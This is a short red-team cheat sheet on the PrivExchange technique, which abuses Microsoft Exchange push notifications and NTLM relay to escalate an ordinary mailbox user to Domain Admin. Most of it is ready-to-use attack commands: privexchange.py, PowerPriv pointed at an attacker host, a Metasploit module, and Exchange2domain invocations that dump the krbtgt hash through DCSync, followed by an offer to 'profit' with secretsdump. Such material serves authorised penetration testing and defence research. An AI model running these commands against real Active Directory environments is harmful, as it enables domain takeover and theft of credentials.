PrivExchange
Exchange your privileges for Domain Admin privs by abusing Exchange.
You need a shell on a user account with a mailbox.
-
Exchange server hostname or IP address
-
Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket).
-
Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server. Forcing the Exchange server's to send back its NTLMv2 hash to a controlled machine.
# https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx python privexchange.py -ah 10.0.0.2 mail01.domain.local -d domain.local -u user_exchange -p pass_exchange # https://github.com/G0ldenGunSec/PowerPriv powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
-
Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash
-
Clean your mess and restore a previous state of the user's ACL
Alternatively you can use the Metasploit module
use auxiliary/scanner/http/exchange_web_server_pushsubscription
Alternatively you can use an all-in-one tool : Exchange2domain.
git clone github.com/Ridter/Exchange2domain
python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip
python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
References
- Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema
- Exploiting PrivExchange - April 11, 2019 - @chryzsh
- [PrivExchange] From user to domain admin in less than 60sec ! - davy
- Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave